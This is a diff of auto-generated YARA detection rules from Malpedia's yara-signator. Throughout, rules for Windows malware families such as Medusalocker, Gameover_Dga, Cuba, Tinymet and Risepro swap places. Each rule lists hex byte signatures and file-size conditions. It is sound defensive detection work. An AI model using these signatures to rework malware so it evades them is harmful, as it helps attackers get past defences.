+		$sequence_9 = { 8bc2 f30f6f0418 660fefc1 f30f7f0418 8d4210 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Disk_Knight_Auto : FILE
+rule MALPEDIA_Win_Contopee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1b68d176-e621-572e-a02b-4eff18ee7835"
+		id = "2c889060-56d8-5d54-aa2d-c629c52f97ce"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disk_knight"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.disk_knight_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.contopee_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "09ce3baeb29e85d6695478868b4b5a99498537909676146b33cec4463b3e4ba4"
+		logic_hash = "5a1991aadc5915c8d606191fa7b0860d33c2887b1b0f8a8e7eb2cdfcb613029d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82820,32 +83084,32 @@ rule MALPEDIA_Win_Disk_Knight_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 56 8b45c4 50 8d4dc0 51 8b3d???????? }
-		$sequence_1 = { ff15???????? 8945a8 a1???????? bf03000000 c745a008000000 85c0 895d88 }
-		$sequence_2 = { 8b06 ff5004 8b4d0c 8d55e8 897de8 8b3d???????? 51 }
-		$sequence_3 = { ff15???????? a1???????? 83c410 3bc3 7510 68???????? 68???????? }
-		$sequence_4 = { 8945cc 895dc4 c7459403400000 8b07 51 52 57 }
-		$sequence_5 = { 8955d8 897dd0 897dcc 897dc8 897dc4 897dc0 897dbc }
-		$sequence_6 = { 894da8 8b4dd4 b80a000000 68???????? 51 894590 8945a0 }
-		$sequence_7 = { db464c dd9d14ffffff 833d????????00 7508 dcb514ffffff eb11 ffb518ffffff }
-		$sequence_8 = { 8985c8fdffff eb0a c785c8fdffff00000000 833d????????00 751c 68???????? 68???????? }
-		$sequence_9 = { 7d0e 68d8000000 68???????? 56 50 ffd3 8b0e }
+		$sequence_0 = { 68???????? ffd5 8b0d???????? a1???????? 83c408 0bc8 7535 }
+		$sequence_1 = { 89461c 896e24 ff15???????? 83c418 85c0 7437 c7460801000000 }
+		$sequence_2 = { 52 55 ff15???????? 55 ff15???????? 8d442410 50 }
+		$sequence_3 = { 6a78 50 53 51 e8???????? 83c414 85c0 }
+		$sequence_4 = { 66392f 7502 33ff 8d442410 56 }
+		$sequence_5 = { c1e807 33d2 8a9094130110 8bc2 66ff848688090000 8b869c160000 8b96a0160000 }
+		$sequence_6 = { 89742430 c744242c01000000 89b42434010000 c784243001000001000000 ff15???????? }
+		$sequence_7 = { 81c632020000 6a02 56 e8???????? 83c408 b801000000 5f }
+		$sequence_8 = { 85c0 0f859a010000 8b442410 55 56 }
+		$sequence_9 = { 8bf7 8bfa 8d5568 c1e902 f3a5 8bc8 33c0 }
 
 	condition:
-		7 of them and filesize < 868352
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Void_Auto : FILE
+rule MALPEDIA_Win_Gameover_Dga_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "89398dc6-137f-5ec6-8d95-3834bc4f980c"
+		id = "bc53f1bb-3d03-5486-b6a3-f98ff0c8f6cd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.void"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.void_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gameover_dga_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9f2df3bf5647831ce19a5214f5a12a4e7816575938889bc15e27938cfd4b8dad"
+		logic_hash = "a8d5697f9821aacef2a257fe69d3238c984983b11a8fa8e5567f601d47382d80"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82859,30 +83123,32 @@ rule MALPEDIA_Win_Void_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8d85d8fbffff 50 8d8d7cfbffff e8???????? 8b95ecfbffff c645fc18 }
-		$sequence_1 = { 50 51 ff7310 8d4b04 e8???????? 8b4b0c 8bd0 }
-		$sequence_2 = { 50 e8???????? 8b4508 83c028 8b4df4 64890d00000000 59 }
-		$sequence_3 = { 83f810 0f85a1000000 8d8544ffffff 50 8d4d94 e8???????? 53 }
-		$sequence_4 = { 56 e8???????? 8a4da0 ff759c 0fb6c1 66c1e108 660bc8 }
-		$sequence_5 = { 56 e8???????? 83c410 ff742420 53 56 e8???????? }
-		$sequence_6 = { 33880c040000 338f0c030000 339808040000 338e0c020000 338a0c010000 339f08030000 339e08020000 }
-		$sequence_7 = { 50 8d4dc4 e8???????? 8d45dc c645fc01 50 8d4e3c }
+		$sequence_0 = { 894c2414 50 51 8bce e8???????? 8bd8 85db }
+		$sequence_1 = { 7ed5 8b442418 3bd0 0f8426ebffff 837c241c00 8bcb 0f8525120000 }
+		$sequence_2 = { 8be5 5d c3 56 e8???????? 84c0 74e1 }
+		$sequence_3 = { c744242c05000000 e8???????? 6a37 8d54243c 59 e8???????? 56 }
+		$sequence_4 = { 8b4604 0345f0 5e 8be5 5d c20c00 83ec14 }
+		$sequence_5 = { 88442423 e8???????? 89442418 85c0 7425 8bc8 e8???????? }
+		$sequence_6 = { b001 c20400 51 f605????????01 56 57 8bf9 }
+		$sequence_7 = { 0f85500e0000 8b442438 5f 5e 5d 5b 83c420 }
+		$sequence_8 = { 0f94c0 c1e108 89442428 0fb64502 0bc8 0fb64503 c1e008 }
+		$sequence_9 = { 56 8bd9 57 8bf3 895c2414 6a00 83e601 }
 
 	condition:
-		7 of them and filesize < 2744320
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Medusalocker_Auto : FILE
+rule MALPEDIA_Win_Bleachgap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c7b2a72f-78dd-502c-b029-e85b0ed2945e"
+		id = "0b3bd641-91e1-5a44-a4c8-6d070b78b23b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.medusalocker_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bleachgap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bleachgap_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "7df5844b357690737586e0cd4cc89af865edb4da022c679b11e7f73e8fc7409a"
+		logic_hash = "3130a827d52ec3314a8f25fbc828dbf76548d8c3f7d1048f0043a6b2ade8d5de"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82896,32 +83162,32 @@ rule MALPEDIA_Win_Medusalocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5004 52 8b00 50 8d4dd8 e8???????? 68???????? }
-		$sequence_1 = { 8b4d0c e8???????? 0fb6c0 85c0 7549 6aff 68???????? }
-		$sequence_2 = { 8955ac 8955b0 8955b4 8d45a8 50 8d4db8 51 }
-		$sequence_3 = { 8d4dd8 e8???????? 0fb708 83f95c }
-		$sequence_4 = { e8???????? 83c408 8945e0 8b55e0 8955dc }
-		$sequence_5 = { 64a300000000 894df0 8b4df0 e8???????? c6400800 8b4df0 }
-		$sequence_6 = { 8b4de8 83c150 e8???????? 8b4de8 e8???????? 8b4df4 64890d00000000 }
-		$sequence_7 = { e8???????? 8b4d08 83c148 51 }
-		$sequence_8 = { 83ec08 8bcc 8965e0 8d4508 50 e8???????? 8b4de4 }
-		$sequence_9 = { 8945ec eb07 c745ec00000000 8b55ec 8955e8 c745fcffffffff 8b4de8 }
+		$sequence_0 = { ff742420 e8???????? 83c404 8bc3 5f 5e 5d }
+		$sequence_1 = { ff7604 8bf8 e8???????? 83c410 8bf0 85ff 0f8444020000 }
+		$sequence_2 = { c3 ff760c e8???????? 83c404 8944241c 85c0 0f8432010000 }
+		$sequence_3 = { 8b85d8f6ffff 0fb7048574ae5f00 8d048570a55f00 50 8d85f0f6ffff 03c7 50 }
+		$sequence_4 = { e8???????? 83c404 c645fc09 85ff 742d 8b4de8 8bc7 }
+		$sequence_5 = { ff442418 85f6 0f8564feffff 8b5c2410 53 e8???????? 83c404 }
+		$sequence_6 = { 8b8424bc000000 8b00 85c0 0f45c8 33db 894c2410 33ed }
+		$sequence_7 = { ba02000000 89471c 8bdd 8bf5 eb42 01471c 8bdd }
+		$sequence_8 = { c745e400000000 c745e80f000000 8a01 41 84c0 75f9 2bca }
+		$sequence_9 = { ff7650 e8???????? 83cdff 8d4e10 83c404 896c2420 837e7800 }
 
 	condition:
-		7 of them and filesize < 1433600
+		7 of them and filesize < 4538368
 }
-rule MALPEDIA_Win_Powersniff_Auto : FILE
+rule MALPEDIA_Win_Gibberish_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96668c35-22ff-5b9e-ae57-ee3a83835c94"
+		id = "865bad8c-5684-533c-98cd-44918d4d88e8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.powersniff_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gibberish_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "61f4abb0e5c4aeea392fa5c634ad49408a74795c9a7a1a686ae66d78616fe1f2"
+		logic_hash = "c8df032f5625050a647f354eb2ac9a0b117355c598425d253e17209609dc1370"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82935,32 +83201,32 @@ rule MALPEDIA_Win_Powersniff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 754b 68???????? 8d856cfeffff 50 ffd6 }
-		$sequence_1 = { 3314b590840010 8b75fc 3310 8b4dec }
-		$sequence_2 = { 8b5dfc c1eb18 33349d90780010 8b5dec 8975f4 c1eb10 }
-		$sequence_3 = { c1eb10 337004 0fb6fb 8b5df0 }
-		$sequence_4 = { 33c0 668903 394508 740a ff7508 53 ff15???????? }
-		$sequence_5 = { 744c ff7508 57 e8???????? 8944240c }
-		$sequence_6 = { 8b5c85dc 85db 75e5 eb07 c745f801000000 8b45f8 }
-		$sequence_7 = { ff35???????? ffd7 3975f0 740c ff75f0 56 ff35???????? }
-		$sequence_8 = { 85c0 7c1e 8b4508 3bc3 }
-		$sequence_9 = { ffd6 85c0 752e 68???????? }
+		$sequence_0 = { 8d8d60ffffff e8???????? c703???????? 8bc3 897b28 89732c e8???????? }
+		$sequence_1 = { 33d2 f77510 895590 8945a0 83fa0a 7d09 c745a430000000 }
+		$sequence_2 = { 660f58348510ed4500 660f5625???????? f20f58f0 660f54cc f20f10d3 660f73d31f }
+		$sequence_3 = { 8b0ccdf2a94700 0fb680c8a94500 330cc5f1a94700 8bc2 c1e818 0fb680c8a94500 330cc5f4a94700 }
+		$sequence_4 = { 663906 0f8542fdffff e9???????? 55 8bec 51 }
+		$sequence_5 = { 0f1f4000 8a07 47 84c0 75f9 8b7314 2bfa }
+		$sequence_6 = { 89842488000000 8bc1 c1c00a 33d0 }
+		$sequence_7 = { 56 57 f6c303 0f850f010000 a803 0f8507010000 8bfa }
+		$sequence_8 = { 334c2420 23c1 33442424 03c2 8944241c 85ed 743c }
+		$sequence_9 = { 25ff000000 83c001 25fe010000 f20f593c85e0dc4500 660f122c85e0dc4500 03c0 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 1068032
 }
-rule MALPEDIA_Win_Dramnudge_Auto : FILE
+rule MALPEDIA_Win_Cuba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "16a885b0-9bee-5a69-bfc1-f44df8ee4d9a"
+		id = "3602e8da-452a-5ed9-9344-c7f4379dda1d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dramnudge_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cuba_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "1c6ef479d0cf6562ae3d91df027da2da66ff27de574cb4249d01e23b1b7fe9ee"
+		logic_hash = "7c1547f930142355cbe84e5424404f219fb1f83bf4df86f3c7d2bdf36e965b58"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82974,32 +83240,38 @@ rule MALPEDIA_Win_Dramnudge_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 894590 8b5590 8955f8 8d4df0 894d8c }
-		$sequence_1 = { 8bcb 895808 89480c 895010 8b400c 33d2 }
-		$sequence_2 = { 59 03c6 50 e8???????? 83c40c 53 e8???????? }
-		$sequence_3 = { 52 51 8b45b0 50 8d45f8 }
-		$sequence_4 = { 66c745c41400 51 e8???????? 59 50 53 }
-		$sequence_5 = { 56 e8???????? 59 8bd8 53 53 8b4508 }
-		$sequence_6 = { 7602 8bf7 8bc7 0bc6 7516 e8???????? 50 }
-		$sequence_7 = { c1e204 83c204 52 e8???????? 59 }
-		$sequence_8 = { 40 750f 6a01 8b13 8b0a 51 }
-		$sequence_9 = { 7409 57 ff5334 59 8bf0 eb09 }
+		$sequence_0 = { 0019 43 41 00444341 }
+		$sequence_1 = { 0026 43 41 00b043410062 }
+		$sequence_2 = { 3914c5e89b4100 7408 40 83f81d 7cf1 }
+		$sequence_3 = { a1???????? 33c5 8945fc e8???????? 84c0 0f854d010000 }
+		$sequence_4 = { 000d???????? 384100 b538 41 }
+		$sequence_5 = { 8d85fcfeffff 898df8fdffff 50 6a01 53 ff15???????? ffb5fcfeffff }
+		$sequence_6 = { 03b1e0b14100 8bc3 03b40dfcfeffff 03b5ecfeffff }
+		$sequence_7 = { 8985bcf9ffff 83cfff 33c0 c785c0f9ffff2c020000 668985ecfbffff 668985f4fdffff 8d85c0f9ffff }
+		$sequence_8 = { 3385ecfeffff 0bcb 03f0 238df4feffff 8b85e0feffff 03b40508ffffff 03b0ecb14100 }
+		$sequence_9 = { c745e008934100 e9???????? c745e010934100 e9???????? c745e018934100 }
+		$sequence_10 = { 0026 45 41 003a }
+		$sequence_11 = { e8???????? 8bf8 b900010000 8d85f8fdffff 89bdbcfbffff }
+		$sequence_12 = { 000c43 41 0035???????? 43 }
+		$sequence_13 = { 003a 45 41 004245 }
+		$sequence_14 = { 0012 45 41 0026 }
+		$sequence_15 = { 000446 41 00d1 45 }
 
 	condition:
-		7 of them and filesize < 1294336
+		7 of them and filesize < 1094656
 }
-rule MALPEDIA_Win_Cryptic_Convo_Auto : FILE
+rule MALPEDIA_Win_Catb_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ee0bcadb-9b51-5f84-8a43-144a3ffa84ad"
+		id = "7782ecd0-01e3-5ca1-93ff-bd4a61ae70c3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptic_convo_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catb"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.catb_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "ba224512d1d5c20e7f8dff36dcd163b0f00725bbb0cb250e1837ecee50522cf5"
+		logic_hash = "49ea54be47b78595def43aa15eb04fc0e876132d1319a21babeae83d5fcf1c52"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83013,34 +83285,34 @@ rule MALPEDIA_Win_Cryptic_Convo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? ff35???????? ff15???????? 8b06 8bce ff9064010000 }
-		$sequence_1 = { 8d9ddcfcffff e8???????? 59 59 85c0 0f8406020000 }
-		$sequence_2 = { 6a00 50 e8???????? be???????? 8d7dc8 a5 }
-		$sequence_3 = { c3 8b442404 33d2 f7742408 85d2 7505 8b442404 }
-		$sequence_4 = { 53 eb25 803d????????01 741b 803d????????01 }
-		$sequence_5 = { 85f6 7508 ff15???????? eb06 ff15???????? }
-		$sequence_6 = { 8d85e0fcffff 50 66a5 ffd3 59 59 85c0 }
-		$sequence_7 = { 8b85ecfcffff 8b95f4fcffff 53 ff7510 89540134 50 }
-		$sequence_8 = { 5e e8???????? c9 c3 e8???????? c20400 }
-		$sequence_9 = { 75f8 be???????? a5 a5 8d85c0fdffff 50 66a5 }
+		$sequence_0 = { 0f2805???????? 48898530020000 488d442468 4889442448 }
+		$sequence_1 = { 83f801 751c 488b4530 488b8888000000 488d05aa0f0100 }
+		$sequence_2 = { 418be9 48c1f806 488d0d14e40300 4183e23f 4903e8 498bf0 }
+		$sequence_3 = { 4183f90f 7779 428b8c8e38c80000 4803ce ffe1 660f73fa01 eb65 }
+		$sequence_4 = { 48ffc7 803f20 74f8 be05000000 488d151d9f0000 448bc6 488bcf }
+		$sequence_5 = { 7832 3b0d???????? 732a 4863c9 4c8d05e89f0300 488bc1 }
+		$sequence_6 = { 48ffcb ffc2 0fb603 4280bc087098010000 74e3 440fb603 }
+		$sequence_7 = { 7326 4863c9 488d15a49d0300 488bc1 83e13f }
+		$sequence_8 = { 4983ceff 33db 4c8d25e8a10300 895c2420 }
+		$sequence_9 = { 44895c2448 81fae9fd0000 0f8570010000 4c8d3d23aaffff 418bd3 }
 
 	condition:
-		7 of them and filesize < 97280
+		7 of them and filesize < 593920
 }
-rule MALPEDIA_Win_Nevada_Auto : FILE
+rule MALPEDIA_Win_Yty_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0fb24068-87ce-54a0-ba82-bfdd95f811de"
+		id = "9e49fc42-83f5-52d0-90c6-9df681f170fe"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nevada"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nevada_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yty_auto.yar#L1-L512"
 		license_url = "N/A"
-		logic_hash = "e8b202252b082c203b7b36b32325aea4ef97f49142f8ff76e8fa7afc9a175f74"
+		logic_hash = "24d2496487d3e8a74d1838cfbb75ce014466580ad0212ac1fc21d0ad856e5f75"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -83052,32 +83324,77 @@ rule MALPEDIA_Win_Nevada_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 90 4881c4b8000000 5b 5f 5e 5d }
-		$sequence_1 = { e8???????? 4c8bad10060000 4c3bad08060000 751d c6852206000000 488d8d00060000 4c89ea }
-		$sequence_2 = { 7413 488b4c3320 4801d2 41b802000000 e8???????? 488b8cfb18020000 4885c9 }
-		$sequence_3 = { 488d9d70060000 4c8db5e0040000 4c8da508050000 662e0f1f840000000000 90 4c896c2438 4c897c2430 }
-		$sequence_4 = { 4c89ee 48f7d6 4801c6 6689b722030000 4a8d0c6d00000000 4c01e9 4889ca }
-		$sequence_5 = { 4c8bac2490000000 4b8d0c2e 4883c1ff 4839d1 0f8362020000 4d8d46ff 4c8b942488000000 }
-		$sequence_6 = { 75dc 0fb744244e 6685c0 74e2 6683f82e 75cc 66837c245000 }
-		$sequence_7 = { 660febea f30f7f6e58 660fdbcb 660fdfd8 660febd9 f30f7f5e68 4889f0 }
-		$sequence_8 = { 4889c1 e8???????? 4885c0 0f846a0a0000 4889c1 e8???????? 4889c3 }
-		$sequence_9 = { 84db 780a 4983c101 31c0 89de }
+		$sequence_0 = { 8b45d8 83e001 0f840c000000 8365d8fe 8b7508 e9???????? c3 }
+		$sequence_1 = { 8d45f4 64a300000000 8b7508 33ff 897dd8 }
+		$sequence_2 = { 8a1402 2ad1 8bfe 80ea04 b901000000 e9???????? }
+		$sequence_3 = { 7303 8d5508 8b4e10 397e14 7204 8b3e }
+		$sequence_4 = { 50 e8???????? 83c40c 8d8de8fdffff 51 53 }
+		$sequence_5 = { 52 50 8b410c ffd0 8d4f08 51 }
+		$sequence_6 = { 8bfe 80ea13 b902000000 e9???????? 8b5508 397d1c 7303 }
+		$sequence_7 = { 8b35???????? 85c0 52 0f95c3 ffd6 }
+		$sequence_8 = { 50 ffd2 ff15???????? 8a857bffffff 8b4df4 }
+		$sequence_9 = { 8bfe 80ea04 b904000000 eb23 8b5508 397d1c 7303 }
+		$sequence_10 = { 8d8de8fdffff 51 53 53 6a28 53 ff15???????? }
+		$sequence_11 = { 807def00 8b5de8 7503 83cb02 8b16 }
+		$sequence_12 = { 33c0 8945f0 8906 894604 894608 8945fc 56 }
+		$sequence_13 = { 8975e0 85c9 7407 8b11 8b4204 }
+		$sequence_14 = { 668910 8bc6 5b 8be5 5d c20400 }
+		$sequence_15 = { 33db 895de8 885def 8975e0 }
+		$sequence_16 = { 397e14 7214 8a1402 8b3e 2ad1 80ea13 b902000000 }
+		$sequence_17 = { 80ea04 b901000000 e9???????? 8a1402 2ad1 8bfe }
+		$sequence_18 = { 6a01 8bcf e8???????? 8b0e 8b5104 8b443238 c645ef01 }
+		$sequence_19 = { 85d2 0f8425010000 83f904 0f8712010000 }
+		$sequence_20 = { 33c9 33c0 8d7910 85d2 }
+		$sequence_21 = { 8b07 eb02 8bc7 8b4de0 }
+		$sequence_22 = { 8ad1 c0ea02 8ac4 80e20f c0e004 }
+		$sequence_23 = { 8b4c1938 895dd4 85c9 7405 8b01 ff5004 c745fc00000000 }
+		$sequence_24 = { e8???????? 83c420 3ac3 7459 8b9dc4f5ffff 39bdd8f5ffff }
+		$sequence_25 = { 83e908 8d7608 660fd60f 8d7f08 8b048d24f94000 ffe0 f7c703000000 }
+		$sequence_26 = { 8b4604 33c9 668908 8bce }
+		$sequence_27 = { 3bf4 e8???????? 8bf4 8b4594 50 ff15???????? }
+		$sequence_28 = { 8bc7 33c9 668908 8b5d08 894dfc c745f001000000 }
+		$sequence_29 = { e8???????? 8945e8 8d45e8 50 8955ec e8???????? 8bf0 }
+		$sequence_30 = { 83c404 c645fc19 8b85a4bcf0ff c705????????01000000 83f810 7245 }
+		$sequence_31 = { 8b048dc4f14000 ffe0 f7c703000000 7413 8a06 }
+		$sequence_32 = { c74410e05c584600 8b42e0 8b4804 8d41e8 }
+		$sequence_33 = { c7858cfcffff00000000 6a40 6a00 8d8590fcffff 50 e8???????? }
+		$sequence_34 = { 8b0d???????? 83c408 2b0d???????? 8bf0 }
+		$sequence_35 = { 85c9 743f ff75f4 8b15???????? 51 }
+		$sequence_36 = { c745f32e747874 c645f700 c7458b00000000 8d458f b960000000 bb00000000 }
+		$sequence_37 = { c745e000000000 8b45f8 5f 5e 5b 81c4e4000000 3bec }
+		$sequence_38 = { 8b0c8d00b04600 807c012900 7407 32c0 e9???????? 837d1400 }
+		$sequence_39 = { c6041800 6a10 68???????? 8bce e8???????? 6aff }
+		$sequence_40 = { 8b0485a0244300 c644080401 57 e8???????? }
+		$sequence_41 = { 6bc930 8975e0 8db190f94200 8975e4 eb2b 8a4601 }
+		$sequence_42 = { 660f56fa 25ff000000 83c001 25fe010000 f20f593c85c0014600 660f122c85c0014600 }
+		$sequence_43 = { c7465c28c14200 83660800 33ff 47 }
+		$sequence_44 = { 8b5df0 33ff 8945dc 8b1c9d60cb4300 895de0 f6441a2848 8b5d08 }
+		$sequence_45 = { 0f87a4030000 ff24bda7714200 8bc6 e9???????? 8b50e4 3b51e4 7469 }
+		$sequence_46 = { 1d1d1d1d1d 1d1d1d1d1d 1d1d1d1d1d 1213 }
+		$sequence_47 = { ff15???????? 3bf4 e8???????? 8d85e8feffff 50 68???????? }
+		$sequence_48 = { eb24 a1???????? 8944240c c744240801000000 c744240401000000 8d45f3 890424 }
+		$sequence_49 = { 89542404 890424 e8???????? e8???????? a1???????? 890424 }
+		$sequence_50 = { 85c0 0f8430010000 a1???????? 890424 }
+		$sequence_51 = { a1???????? 8b5de4 895c2418 894c2414 89542410 8974240c 8b5508 }
+		$sequence_52 = { 890424 e8???????? 3b45f4 77dd }
+		$sequence_53 = { eb3d a1???????? 8b0d???????? 8b15???????? 01ca }
+		$sequence_54 = { 890424 e8???????? 8945dc 817ddce0070000 0f8ece030000 c70424???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 1063936
+		7 of them and filesize < 1097728
 }
-rule MALPEDIA_Win_Lobshot_Auto : FILE
+rule MALPEDIA_Win_Tinymet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "85b1eb24-9f05-55a3-8f6f-6e4c63293758"
+		id = "3b877ab0-4cfd-5a16-b545-cbd2432f7e3a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lobshot_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinymet_auto.yar#L1-L102"
 		license_url = "N/A"
-		logic_hash = "18b4e7449b3d62631766d70c0d11905d5078e9b18e0b08eccb6d10a0123c3b2d"
+		logic_hash = "18fdd73d173a567cb669dcb2f204fa6a5132161bf80e753f323b92b81adc0ad1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83091,32 +83408,30 @@ rule MALPEDIA_Win_Lobshot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5c2414 8b35???????? 8d442448 50 57 ffd6 eb06 }
-		$sequence_1 = { ffd5 85c0 7429 6a00 ff35???????? 6a00 50 }
-		$sequence_2 = { fec0 5e 88411c 5b c3 56 8bf1 }
-		$sequence_3 = { 8bf9 895df8 8b430c 8945fc 8b7730 8b4734 3bf0 }
-		$sequence_4 = { ffd5 33c0 66898424c8020000 8d442470 50 8d8424cc020000 }
-		$sequence_5 = { 57 33ed 89542464 8d442458 c74424581e000000 50 }
-		$sequence_6 = { 8b5614 8b4e08 8a86b1160000 88040a b110 2a8eb4160000 8b45e4 }
-		$sequence_7 = { c744242400000000 ff15???????? 85c0 7520 6a04 8d442414 50 }
-		$sequence_8 = { 33f6 8b4dec 8bd9 834df8ff f7db 8b55e4 8b840538ffffff }
-		$sequence_9 = { 7405 48 85c0 7fe9 6683bc44bc0200002e 750a 33c9 }
+		$sequence_0 = { e9???????? 6a01 eb1b 6a01 }
+		$sequence_1 = { e8???????? 59 3bf0 72ee 5f 5e }
+		$sequence_2 = { 56 668907 e8???????? 83c702 a3???????? 6a5f }
+		$sequence_3 = { a3???????? 5e c3 68???????? e8???????? 59 }
+		$sequence_4 = { 50 e8???????? 83c40c 83f85c 75e4 }
+		$sequence_5 = { e9???????? 8b400c ff750c 8b00 8b00 }
+		$sequence_6 = { 83feff 751b 68???????? e9???????? ff15???????? 85c0 }
+		$sequence_7 = { 85f6 7509 a1???????? 8b30 eb03 83c602 }
 
 	condition:
-		7 of them and filesize < 247808
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Risepro_Auto : FILE
+rule MALPEDIA_Win_Fireball_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
